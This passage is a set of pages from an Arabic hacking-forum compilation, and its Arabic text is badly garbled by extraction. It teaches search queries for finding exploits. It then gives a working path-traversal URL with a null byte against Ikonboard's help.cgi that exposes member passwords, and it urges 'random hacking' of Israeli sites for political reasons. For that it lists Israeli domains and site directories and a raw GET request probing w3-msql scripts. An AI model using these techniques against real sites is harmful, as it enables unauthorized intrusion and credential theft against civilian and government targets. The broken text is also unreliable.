‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚ‬ ‫ﺘﻤﯿﺰ ﻋﻨﻚﺑﺎﻧﻪ ﯾﺠﯿﺪاﻟ‬ ‫ﺻﺢ ‪//‬اﻟﻔ ﺮ قﺑﯿﻨﻚ وﺑﯿﻦ ﻫﺬااﻟﺸﺨ ﺺ ‪..‬انﻫﺬااﻟﺸﺨ ﺺ ﯾ‬
‫ﻋﻠﻰ ﻋﻜﺴﻚﺗﻤﺎﻣﺎ ‪....‬‬
‫اﻻن ﺳﻨﻘﻮمﺑﺸ ﺮ حاﻟﻄ ﺮﯾﻘﺔاﻟﻤﺜﻠﻰﻟﻌﻤﻠﯿﺔاﻟﺒ ﺤﺚ ‪:‬‬
‫ﻗﻊاﻟﻰ ‪:‬‬ ‫ﻃ ﺮﯾﻘﻪﺑﺴﯿﻄﻪ ﺟﺪا وﻫﻲ ﻋﺒ ﺮﺗﻘﺴﯿﻢاﻟﻤﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﻗﻊﺗﺠﺎرﯾﻪ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻮا‬
‫ﻗﻊﺑ ﺮاﻣ ﺞ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬﻤﺔﺑﻬﺎ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﺘﯿﻤﯿﺪﯾﺎ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻗﻊ ﻣﻠ‬‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﻗﻊ ﺳﯿﺎﺳﯿﻪ وا ﺧﺒﺎرﯾﻪ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﻗﻊ ﻫﺎك وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﻗﻊﻛ ﺮاك وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﺘﻲ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻗﻊ ﺳﻜﯿﻮرﯾ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﻗﻊ ﻫﺎردوﯾ ﺮ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻮا‬
‫ﺘﻤﺔﺑﻬﺎ‬ ‫ﺘﺪﯾﺎ ت وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ‬ ‫ﻣﻨ‬
‫ﺘﻮﻓ ﺮ ﺟﻤﯿﻊاﻟﻤﺠﺎﻻ ت ﺿﻤﻨﻪﺗﻘ ﺮﯾﺒﺎ وﻟﺴﻮاﺑﻘﺔاﻟﻤﺸﻬﻮدﻟﻪﺑﻬﺎ ﻣﻦﻛ ﻞ‬ ‫واﻧﺎاﻓ ﻀ ﻞ داﺋﻤﺎ ﻣ ﺤ ﺮكﺑ ﺤﺚ ﺟﻮﺟ ﻞﻟ‬
‫ﻗﻊﻟﻜ ﻞ ﻫﻜ ﺮ ‪.....‬‬‫ﻫﻜ ﺮﻓﻬﻮﺑﺎﻟﻨﺴﺒﺔﻟﻲاﻓ ﻀ ﻞ ﻣﻮ‬
‫ﻃﯿﺐاﻻناذاأرد تاﻟﺒ ﺤﺚ ﻋﻦﺑ ﺮﻧﺎﻣ ﺞ ﻣﻌﯿﻦ ﻣﺎ ﻫﻲاﻓ ﻀ ﻞ واﺳ ﺮ عاﻟﻄ ﺮ قﻟﻠﻮﺻﻮ لﻟﻬﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ؟‬
‫ﺘﺠﯿﺐ ﻋﻠﻲﺑﻬﺬااﻻﺟﺎﺑﺔ ‪...‬‬ ‫ﺘﺄﻛﺪﺑﺎﻧﻚﻟﻮﻓﻜ ﺮ تﻗﻠﯿﻼ ﺳ‬ ‫اﻧﺎ ﻣ‬

‫‪٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊاﻟﺒ ﺤﺚ ﻋﻦاﻟﺒ ﺮاﻣ ﺞ وأ ﺿﻊاﺳﻢاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﻄﻠﻮب وﻓﻲ ﻧﻬﺎﯾﺔاﺳﻢاﻟﺒ ﺮﻧﺎﻣ ﺞ أ ﺿﻊ‬ ‫ﺎوﻻاذﻫﺐاﻟﻰ ﻣﻮا‬
‫ﺘﺪاداﻟﺬي ﻏﺎﻟﺒﺎ ﻣﺎﺗﻜﻮن ﻋﻠﯿﻪ ﻫﺬهاﻟﺒ ﺮاﻣ ﺞ‬ ‫اﻻﻣ‬
‫‪ Prog.zip‬أو ‪prog.exe‬‬
‫ﻣﺜﻼاﻧﺎاﺑ ﺤﺚ ﻋﻦﺛﻐ ﺮهأﻋ ﺮ ف ﻧﻮﻋﻬﺎ وﻟﻜﻨﻲ ﻻأﻋ ﺮ ف ﻣﺼﺪرﻫﺎ وارﯾﺪ ﻣ ﺮﺟﻊﻟﻬﺎﻟﺰﯾﺎدةاﻻ ﻃﻼ ع ﻣﺎذاأﻓﻌ ﻞ‬
‫؟؟؟‬
‫ﺘﺼﺎرﻫﺎ ‪XSS‬او ‪CSS‬‬ ‫ـ ‪ Cross Site Scripte‬واﻟﻠﻲا ﺧ‬ ‫ﺘﻜﻦ ﻣﺜﻼﺛﻐ ﺮا تاﻟ‬ ‫وﻟ‬
‫ﺘﻌﻠ ﻖ‬ ‫ﺘﯿﺠﺔﺑ ﺤﺚﻻﺑﺄسﺑﻬﺎ ﻋﻦ ﻛ ﻞ ﻣﺎ ﯾ‬ ‫ﺘﻜﻮنﻟﺪﯾﻚ ﻧ‬ ‫ﺘﻲاﺑ ﺤﺚ ﻋﻦﻛﻠﻤﺔ ‪ XSS‬ﺳ‬ ‫ﻗﻊاﻟﺴﻜﯿﻮرﯾ‬ ‫اذﻫﺐاوﻻﻟﻤﻮا‬
‫ﺘﺐ ‪xss+ exploit + bug‬‬ ‫ﺑﻬﺎ أواذﻫﺐاﻟﻰ ﺟﻮﺟ ﻞ واﻛ‬
‫ﺘﻌﻠﻘﺔﺑﻤﺎ ﻧﺒ ﺤﺚ ﻋﻨﻪﻟﺬﻟﻚ ﯾﺠﺐان ﻧ ﻀﯿ ﻖ ﻧﻄﺎ قاﻟﺒ ﺤﺚ‬ ‫ﻗﻊ واﻟﻤ ﺮاﺟﻊاﻟﻤ‬ ‫اﻟﺠﻮﺟ ﻞ ﺳﯿﻌﻄﯿﻨﺎﻛﻤﯿﺔﻛﺒﯿ ﺮ ﻣﻦاﻟﻤﻮا‬
‫ﺘ ﺤﺪﯾﺪاﻟﺒ ﺤﺚﺑﻌﻼﻣﻪ ) ‪ ( +‬واذاارد تﻓﻌﻠﻲاناﺑ ﺤﺚ ﻋﻦﺑﺠﺰ ‪ Bugs‬و‬ ‫ﺣﻮ لاﻟﻤﻄﻠﻮبﻓﻘﻂ وﻟﺬﻟﻚ ﻋﻠﻲﺑ‬
‫ﺘﺐ ‪XSS+BUG+EXPLOIT :‬‬ ‫اﻛﺴﺒﻠﻮﯾ ﺖﺑﺎﺳﻢاﻟﺜﻐ ﺮه ﻓﻌﻠﻲاناﻛ‬
‫ﺘﺐ ‪IIS+exploit+bug :‬‬ ‫ﻣﺜﻼاﺑ ﺤﺜﻌﻦ ﺛﻐ ﺮا ت ‪ IIS‬ﺳﺄﻛ‬
‫وﻫﻜﺬا‬
‫ﺘﻲﻗﺪﺗﻔﯿﺪﻛﻢﻓﻲ ﻋﻤﻠﯿﺔاﻟﺒ ﺤﺚ ‪:‬‬ ‫ﻗﻊاﻟ‬ ‫اﻻن ﺳﺎ ﺿﻊﻟﻜﻢ ﻣﺠﻤﻮﻋﻪ ﻣﻦاﻟﻤﻮا‬

‫ﺘ ﺤ ﻖأﻛﺜ ﺮ‬
‫ﻗﻊﻓﻬﻮ ﯾﺴ‬
‫ﺘﻄﻠﻘﻪ ﻋﻠﻰ ﻫﺬااﻟﻤﻮ‬
‫ﺘ‬‫ﻗﻊﺑﺨﺎدماﻟﻬﻜ ﺮز وﺳﯿﺪاﻟﻬﻜ ﺮز وووووﻛ ﻞ ﻣﺎ ﺳ‬
‫اﻧﺎأﺳﻤﻲﻫﺬااﻟﻤﻮ‬
‫‪/http://www.google.com :‬‬

‫ﺘﻘﺪﻣﻪ ‪/http://www .altavista.com - /http://www.yahoo.com :‬‬ ‫ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻋﺎدﯾﻪ وﻣ‬


‫‪/http://hotbot.lycos.com - /http://www.lycos.com -‬‬

‫ﻗﻊ ﺳﯿﺎﺳﯿﻪ وا ﺧﺒﺎرﯾﻪ ‪- http://news.bbc.co.uk/hi/arabic/news :‬‬


‫ﻣﻮا‬
‫‪http://www.aljazeera.net/ - http://arabic.cnn.com/‬‬

‫ﺘﻲ ‪- http://www.securiteam.com/ :‬‬ ‫ﻗﻊ ﺳﻜﯿﻮرﯾ‬ ‫ﻣﻮا‬


‫‪- http://www.ussrback.com/ - http://www.securityfocus.com/‬‬
‫‪- http://www.ntsecurity.nu/ - http://www .ntbugtraq.com/‬‬
‫‪http://www.ntsecurity.com/‬‬
‫ﺘ ﺮاكﻓﻲ‬
‫ﺘ ﺮاك ﯾﻘﻮاﺋﻤﻬﻢاﻟﺒ ﺮﯾﺪﯾﺔ وأﻧﺼﺢاﻟﺠﻤﯿﻊﺑﺎﻻﺷ‬
‫وأﻧﺎﺗﺼﻠﻨﻲا ﺧ ﺮاﻟﺜﻐ ﺮا ت ﻋﻠﻰﺑ ﺮﯾﺪي ﻣﻦ ﺧﻼ لاﻻﺷ‬
‫ﻗﻮاﺋﻤﻬﻢاﻟﺒ ﺮﯾﺪﯾﺔ‬

‫ﻗﻊﻫﺎردوﯾ ﺮ ‪http://drivers.on- - http://www .asus.com/ - http://nvidia.com/ :‬‬ ‫ﻣﻮا‬


‫‪http://www.amdmb.com/ - http://intel.com/ - line.net.nz/‬‬
‫‪+++++++++++++++++++++++++++‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚ ‪:‬‬
‫ﺄﯾ ﻀﺎ ﻫﻨﺎﻟﻚﺑﻌ ﺾاﻟﻤﻬﺎرا ت اﻟﻤﻬﻤﺔﻓﻲاﻟ‬
‫ﻗ ﺮب ﻣﺜﺎ ل ﺟﻮﺟ ﻞ‬
‫ﺘﯿﺢﺑﻌ ﺾ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚﻫﺬهاﻟﺨﺎ ﺻﯿﺔ وا‬ ‫ﺘﺎﺋ ﺞاﻟﺒ ﺤﺚاﻟ ﺤﺎﻟﯿﺔ ‪.....‬ﺗ‬
‫*‪*-‬اﻟﺒ ﺤﺚ ﺿﻤﻦ ﻧ‬
‫ﺘﺠﺪ ﺧﯿﺎراﻟﺒ ﺤﺚ‬‫ﺘﺐ ﻣﺜﻼ ‪ exploit‬ﺛﻢﺑﺄﺳﻔ ﻞاﻟﺼﻔ ﺤﺔ ﺳ‬ ‫ﺣﯿﺚاﻧﻲ ﻣﺜﻼﻟﻜﻲأﺑ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﺔﻓﺎﻧﻲاﻛ‬
‫ﺘﻌ ﺮ ف‬‫ﺘﺐ ‪ list.php3‬ﻟ‬ ‫ﺘﺎﺋ ﺞاﻟﻤﻮﺟﻮدةﻓﻤﺜﻼاﻛ‬ ‫ﺘﺎﺋ ﺞاﻟ ﺤﺎﻟﯿﺔ ‪....‬ﻓﺎﺑ ﺤﺚ ﻋﻦﺛﻐﺮﺗﻚ ﺿﻤﻦﻫﺬهاﻟﻨ‬ ‫ﺿﻤﻦاﻟﻨ‬
‫اﻟﺜﻐ ﺮةاﻟﻤﻮﺟﻮدة ﺿﻤﻦ ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ‪ ....‬وﻫﻜﺬا‬
‫ﺘﺨﺪم ‪ +‬و –ﻓﻤﺜﻼ‬ ‫*‪*-‬أﯾ ﻀﺎاﺳ‬
‫‪Exploit + bug + anyprog‬‬
‫ﺘﺎﺋ ﺞ‬
‫ﺘﻮي ﻋﻠﻰ ﺟﻤﯿﻊاﻟﻜﻠﻤﺎ تاﻟﺜﻼ ثﻓﻲ ﺟﻤﯿﻊاﻟﻨ‬ ‫ﺘﺎﺋ ﺞ ﻻﺑﺪانﺗ ﺤ‬‫ﻓﺎناﻟﻨ‬

‫‪٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪Exploit - bug - anyprog‬‬

‫ﺘﻮي ﻋﻠﻰ ﻫﺬهاﻟﻜﻠﻤﺎ تاﻟﺜﻼ ثﻓﺎنﻟﻢﻓ ﻀﻊاﻟﻤﻮﺟﻮد ﺳﻮا ء‬ ‫ﺘ ﺤﺴﻦانﺗﻜﻮنﺗ ﺤ‬ ‫ﺘﺎﺋ ﺞ ﯾﺴ‬‫ﻓﺎﻧﻚﺗﺨﺒ ﺮهﺑﺎناﻟﻨ‬
‫ﺘﯿﻦاوﻛﻠﻤﺔ ‪..‬‬‫ﻛﻠﻤ‬
‫ﺘﺪﯾﺎ تﻫﻜ ﺮ "‬ ‫ﻗﻮى ﻣﻨ‬ ‫"أ‬ ‫*‪* -‬‬
‫ﺘﺮﺗﯿﺐﻓﺎﻧﻨﺎ ﯾﺠﺐان ﻧ ﺤﺪدﻫﺎﺑﻘﻮﺳﯿﻦ ﺻﻐﯿ ﺮﯾﻦﻛﺎﻟﻤﺜﺎ لاﻟﺬي‬
‫ﻋﻨﺪاﻟﺒ ﺤﺚ ﻋﻦ ﻣﺠﻤﻮﻋﺔﻛﻠﻤﺎ ت وﺑﻨﻔ ﺲاﻟ‬
‫ﺑﻸﻋﻠﻰ ‪ ...‬وﻫﻜﺬا‪...‬‬

‫‪٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻹﺧﱰاق اﻟﻌﺸﻮاﺋﻲ "‬

‫‪$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻜﻨﺪور‬
‫‪$$$$$$$$$$‬‬
‫‪:‬‬

‫ﺘ ﺮا قاﻟﻌﺸﻮاﺋﻲ ‪Random Hacking‬‬ ‫ـﺈ ﺧ‬


‫‪ -‬ﻣﺎﻫﻮاﻟ‬
‫ـ ‪CGIScripts‬‬
‫ﺘﺜﻤﺎرا ت ﻏﯿ ﺮاﻟ‬‫‪-‬ﺗﻄﻮﯾ ﺮهﺑ ﺤﯿﺚ ﯾﺼﺒﺢ ﯾﺒ ﺤﺚ ﻋﻠﻰإﺳ‬
‫ﺘﻐ ﻞايﺛﻐ ﺮهﺑﻌﺪاﻟ ﺤﺼﻮ ل ﻋﻠﯿﻬﺎ‬‫‪-‬ﻛﯿ ﻒﺗﺴ‬
‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬
‫ﺘ ﺮا قاﻟﻌﺸﻮاﺋﻲ ‪Random Hacking‬‬ ‫ـﺈ ﺧ‬
‫‪ -‬ﻣﺎﻫﻮاﻟ‬

‫ﻗﻊﻛﺜﯿ ﺮه ﺟﺪا ﺟﺎﻫﺰه‬ ‫ﻗﻊ ﻋﻦﺛﻐ ﺮه ﻣ ﺤﺪده ‪ ،‬وﻫﺬا ﺳﻬ ﻞ وﯾﻌﻮدﺑﻤﻮا‬ ‫ﻫﻮاﻟﺒ ﺤﺚﻓﻲﻛﻤﯿﻪﻛﺒﯿ ﺮه ﻣﻦاﻟﻤﻮا‬
‫ـ ‪spiders‬أو‬ ‫ﺘﻤﺪ ﻋﻠﻰاﻟ‬ ‫ﺘﻲﺗﻌ‬ ‫ﺘ ﺮا ق ‪ ،‬ﻣﺜﺎ لﺑﺴﯿﻂ ﺟﺪا ‪ ،‬رو ح ﻋﻠﻰ ﻣ ﺤ ﺮكﺑ ﺤﺚ ‪ ،‬ﻣﻦ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚاﻟ‬ ‫ﻟﻺﺧ‬
‫ﺘﺐ ‪) ، link:xxxx.cgi or pl‬إرﺟﻊﻟﺸ ﺮ ح زوروﻓﻲ رﯾﺎ ﺿﯿﺎ ت‬ ‫اﻟﻌﻨﺎﻛﺐ ﻣﺜ ﻞ ‪ altavista.com‬وأﻛ‬
‫ﺘﯿﺠﻪﻟﻠﺒ ﺤﺚ‬ ‫ﻗﻊاﻟﻤ ﺮدودهﻟﻚ ﻧ‬ ‫اﻟﺒ ﺤﺚ( ﻣﺜﻼ ﻧﺒ ﺤﺚ ﻋﻦﻟﻨﻚﻟﻤﻠ ﻒﺑﺈﺳﻢ ‪help.cgi ، link:help.cgi‬اﻟﻤﻮا‬
‫ﺘﺢ وا ﺣﺪ ﻣﻨﻬﺎ وأﺑ ﺤﺚﻓﻲاﻟﻤﺼﺪراﻟﻜﻮد ‪ HTML‬ﻋﻦاﻟﺴﻜ ﺮﺑ ﺖاﻟﺬي‬ ‫ﺘﺪى ‪، Ikonboard‬إﻓ‬ ‫ﻛﻠﻬﺎﺗﻤﻠﻚ ﻣﻨ‬
‫ﺘﻌ ﺮ فاﯾﻦ ﻣﻜﺎﻧﻪ ‪،‬ﻟﻨﻔ ﺮ ض ﻣﻜﺎﻧﻪﻫﻨﺎ ‪http://www.example.com/cgi-‬‬ ‫ﺑ ﺤﺜ ﺖ ﻋﻨﻪ ‪help.cgi‬ﻟ‬
‫‪bin/help.cgi‬‬
‫ﺘﺐﺑﻌﺪاﻟﻤﻠ ﻒ ﻏﯿ ﺮاﻟﻌﻨﻮانﻟﯿﺼﺒﺢ ‪http://www.example.com/cgi-‬‬ ‫أﻛ‬
‫‪bin/help.cgi?helpon=../members/[member].cgi%00‬‬
‫ﻣﻊ ﻣﻼ ﺣﻈﻪﺗﻐﯿﯿ ﺮ ]‪[member‬ﺑﺈﺳﻢ ﻋ ﻀﻮ وﺑﺪوناﻟﻘﻮﺳﯿﻦ ][ ﻃﺒﻌﺎ‬
‫ﺘﺪى ‪Ikonboard‬‬ ‫ـاﻟﻤﻨ‬‫ﺳﻮ ف ﯾﻌ ﺮ ضﻟﻚ ﻣﻌﻠﻮﻣﺎ تاﻟﻌ ﻀﻮﻛﺎﻣﻠﻪ وﻣﻦ ﻇﻤﻨﻬﺎﻛﻠﻤﺔاﻟﻤ ﺮور وﻫﺬهاﻟﺜﻐ ﺮهﻟ‬
‫‪ 2.1.7‬وﻫﺬاﻟﯿ ﺲﻟﺐ ﻣﻮ ﺿﻮﻋﻲ وﻟﻜﻦﻫﻲﺑﺪاﯾﻪ وﻣﺜﺎ لﻻﺗ ﺤﻔﻈﻪﻷﻧﻲأ ﺣ ﻀ ﺮ تأﺑﺴﻂ ﻣﺜﺎ لﻓﻘﻂﻓﯿﻮﺟﺪ ﻏﯿ ﺮه‬
‫ﺘﺜﻤﺎراﺗﻬﺎﺗﻜﻮن ﻣﻦ ﺧﻼ ل ‪url‬‬ ‫ـ ‪CGIScript‬ﺗﻤﻠﻚﺛﻐ ﺮا ت ﻣﺜ ﻞ ﻫﺬه واﻏﻠﺐإﺳ‬ ‫ﻣﺌﺎ تﺑ ﻞ آﻻ ف ﻣﻠﻔﺎ تاﻟ‬
‫ﺘﻪ‬‫ﺘﺜﻤﺎرا تﻟﺜﻐ ﺮا ت ﻣﻠﻔﺎ تاﻟﺴﻲ ﺟﻲ آي ﺳﻜ ﺮﯾﺒ ﺖ ﺷﻮ فاﻷرﺷﯿ ﻒ ﻫﺬا وﻫﻮﻟﻐ‬ ‫ﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﺜ ﻞ ﻫﺬهاﻹﺳ‬
‫ﺘﺜﻤﺎر‬‫ـ ‪Exploit‬أواﻹﺳ‬ ‫ﺘﻘﺪ وﻟﻜﻦ ﻣﺎ ﯾﻬﻢﻷﻧﻨﺎ ﻧﺒ ﺤﺚ ﻋﻦاﻟ‬ ‫روﺳﯿﻪأﻋ‬
‫‪/http://www.secure.f2s.com/eng_ver/bugs‬‬
‫ـ ‪/http://www.securiteam.com‬‬ ‫ﺘ ﺞ ﻣﺜﻼ وﺗ ﻀﻌﻪﻓﻲ ﻣ ﺤ ﺮكاﻟﺒ ﺤﺚﻟ‬ ‫وﻣﻤﻜﻦﺗﺄ ﺧﺬإﺳﻢاﻟﻤﻨ‬
‫ﺘ ﺮه‬‫ـ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲﻓﻬﻲ ﻣﻔﯿﺪه ﺟﺪاأﻧﺎ ﺷﺎرﻛ ﺖ ﻣﻦﻗﺒ ﻞﻓ‬ ‫ﺘ ﺮكﻓﻲاﻟﻘﺎﺋﻤﻪاﻟﺒ ﺮﯾﺪهﻟ‬ ‫ﺘﺎﺋ ﺞ ‪،‬أوﺗﺸ‬ ‫وﺗﺸﻮ فاﻟﻨ‬
‫ـﺜﻐ ﺮا تاﻟﺴﻲ ﺟﻲ آي ﺳﻜ ﺮﺑ ﺖ ‪ ،‬ﯾﻌﻨﻲاﻣﻦ وا ﺧﺒﺎر وﻛ ﻞ ﺷﺊ‬ ‫ﺘﺼﻪﻓﻲاﻷﻣﻦ وﻟﯿ ﺲﻟ‬ ‫وﺟﺪاأﻋﺠﺒ ﺖﺑﻬﺎ وﻫﻲ ﻣﺨ‬
‫ﺘﺴﻬﯿ ﻞ ﻋﻤﻠﯿﻪ‬‫‪ ....‬وﯾﻮﺟﺪﺑ ﺮﻧﺎﻣ ﺞﺗﻘﺪﻣﻪ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛﺴﻲﺑﺈﺳﻢ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲﺑﯿﺠ ﺮ ‪ ،‬ﻫﻮﺑ ﺮﻧﺎﻣ ﺞﻟ‬
‫اﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻷ ﺧﺒﺎر ووو‪...‬اﻟ ﺦ‬

‫ـ ‪CGIScripts‬‬
‫ﺘﺜﻤﺎرا ت ﻏﯿ ﺮاﻟ‬
‫‪-‬ﺗﻄﻮﯾ ﺮهﺑ ﺤﯿﺚ ﯾﺼﺒﺢ ﯾﺒ ﺤﺚ ﻋﻠﻰإﺳ‬

‫ﻗﻊ وﻟﻮﺑﺪون ﺳﺒﺐﻓﻬﺬهﻫﻤﺠﯿﻪ !! ‪،‬ﻟﻜﻦ‬ ‫ﺘ ﺮ قاي ﻣﻮ‬


‫ﺘ ﺮا قاﻟﻌﺸﻮاﺋﻲإذاﻛﺎنﻓﻌﻼ ﻋﺸﻮاﺋﻲ ‪ ،‬ﯾﻌﻨﻲﺗﺨ‬ ‫اﻹ ﺧ‬
‫ﻗﻮ لﻟﻚﻛﯿ ﻒ ‪ ،‬ﻣﺜﻼإﺳ ﺮاﺋﯿ ﻞاﻟﻠﻲاﻟﻜ ﻞ ﯾﻜ ﺮﻫﻬﺎ‬‫ﺘﻔﯿﺪ ﻣﻨﻪإ ﺣﻨﺎﻓﻲأﻧﻪ ﻣﺎ ﯾﻜﻮنﻓﻲ ﺷﻜ ﻞ ﻫﻤﺠﻲ ‪،‬أﻧﺎا‬
‫ﻣﻤﻜﻦ ﻧﺴ‬
‫ﻗﺎ فإ ﻃﻼ قاﻟﻨﺎر ‪، (:‬اﻟﻜ ﻞ ﯾﻜ ﺮﻫﻬﻢﻟﯿ ﺲﻷﺟ ﻞأﻧﻬﻢ ﯾﻬﻮد ‪ ،‬ﻻ ﻧﻜ ﺮﻫﻬﻢﻷﻧﻬﻢ‬
‫‪،‬اﻟﺬﯾﻦ ﯾﺄﻣ ﺮوناﻟﻔﻠﺴﻄﯿﻨﯿﯿﻦﺑﺄو‬
‫ـ ‪ co.il‬و ‪١١٠٤‬‬ ‫ﺘﻬﻲﺑ‬ ‫ﻗﻌﻬﻢ ﻫﺬاﻫﻮ ‪sites ١٢٦١٠‬ﺗﻨ‬ ‫ﻗﻊﻓﯿﻪ آﻻ ف ﻣﻦ ﻣﻮا‬‫ﻇﻠﻤﻮاﻓﻠﺴﻄﯿﻦ ‪ ،‬ﻋﻨﺪﻫﻢ ﻣﻮ‬

‫‪٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ ‪ gov.il‬وﻫﺬه ﻣﻬﻤﻪ ‪ ،‬و‬


‫ﺘﻬﻲﺑ‬‫ـ ‪ ac.il‬و ‪.sites ٧٨‬ﺗﻨ‬ ‫ﺘﻬﻲﺑ‬ ‫ـ ‪ org.il‬و ‪sites ٧٠‬ﺗﻨ‬ ‫ﺘﻬﻲﺑ‬ ‫‪sites‬ﺗﻨ‬
‫ـ ‪ ، com‬و‬ ‫ﺘﻬﻲﺑ‬‫ـ ‪ muni.il‬و ‪sites ٢٠٠٩‬ﺗﻨ‬ ‫ﺘﻬﻲﺑ‬ ‫ـ ‪ net.il‬و ‪.sites ٢٩‬ﺗﻨ‬ ‫ﺘﻬﻲﺑ‬ ‫‪.sites ٥٤‬ﺗﻨ‬
‫ـ ‪ net‬و ‪ .org - 121 sites‬و ‪.edu - 4 sites‬ﻟﻌﯿﻨﻪ ‪israel.net - 84 ،‬‬ ‫ﺘﻬﻲﺑ‬ ‫‪.sites ١٣٧‬ﺗﻨ‬
‫ﻗﻊﻫﺬا‬‫‪ .sites‬و ‪........ . il - sites‬ﻋﺸﺎنﺗ ﺤﺼ ﻞ ﻋﻠﻰﻛ ﻞ ﻫﺬهاﻟﺴﺎﯾ ﺖ رو حاﻟﻤﻮ‬
‫‪http://iguide.co.il/sites/sites.htm‬‬

‫وﻓﯿﻪﻛﻤﺎن ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ‬

‫‪/http://www.achla.co.il‬‬
‫‪http://www.reshet.co.il/data/index.vs?dw=1‬‬
‫‪/http://www.maven.co.il‬‬
‫‪/http://www.tapuz.co.il‬‬
‫‪/http://www.walla.co.il‬‬
‫‪http://www.info.gov.il/find.pl‬‬

‫وﻓﯿﻪ ﻣ ﺤ ﺮكأﻋﺪم ﻣﻨﻬﺎ واﻟﻠﻲﻫﻮ ‪altavista.co.il‬‬

‫ﺘﻘﻨﻬﺎ‬
‫ﺘﻲ ﯾ‬
‫ﺘﺨﺪماﻟﻠﻐﻪاﻟ‬
‫ﻗﻊ ‪ ،‬ﯾﺴ‬‫اﻟﻤﻬﻢ ﻋﻠﻰﻛ ﻞ ﺷﺨ ﺺ ﻣﻨﺎأن ﯾﺼﻠﺢﻓ ﺮزﻟﻠﺒﯿﺎﻧﺎ تاﻟﻤﻮﺟﻮدهﻓﻲﻫﺬهاﻟﻤﻮا‬
‫ﻟﯿﺼﻨﻊﺑ ﺮﻧﺎﻣ ﺞ ﯾﺼﻠﺢﻓ ﺮز وﯾ ﻀﻌﻬﺎﻓﻲ ﻣﻠ ﻒﺗﻜﺴ ﺖﺑﺪوناﺷﯿﺎ ءﺛﺎﻧﯿﻪ ﻣﻌﻬﺎ‬

‫ﺘﻢاﻟﺸﺒﻚ ﻣﻊ‬
‫ﺘ ﺞ ‪ ،‬ﻣﺜﻼ ‪، /w3-msql‬اﻟﻄ ﺮﯾﻘﻪ ﺳﻬﻠﻪ ﺟﺪا ‪،‬أوﻻ ﯾ‬
‫اﻟﻌﻤﻠﯿﻪاﻟﺜﺎﻧﯿﻪﻫﻲاﻟﺒ ﺤﺚﻓﯿﻬﺎﻛﻠﻬﺎ ﻋﻦ ﻣﻨ‬
‫ﺛﻢ ﯾ ﺮﺳ ﻞﻟﻪأﻣ ﺮ ‪ ، GET‬ﻣﺜﻼﺗ ﺮﺳ ﻞﻟﻠﺒ ﺮوﻛﺴﻲ‬
‫ﺑ ﺮوﻛﺴﻲ ﻣﺜﻼ ‪ proxy.isp.net.sa :8080‬و‬

‫‪GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0‬‬


‫‪*/* ،Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg‬‬

‫‪Accept-Language: ar-sa‬‬
‫‪(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98‬‬
‫‪Host: www.com.il‬‬
‫‪Proxy-Connection: Keep-Alive‬‬

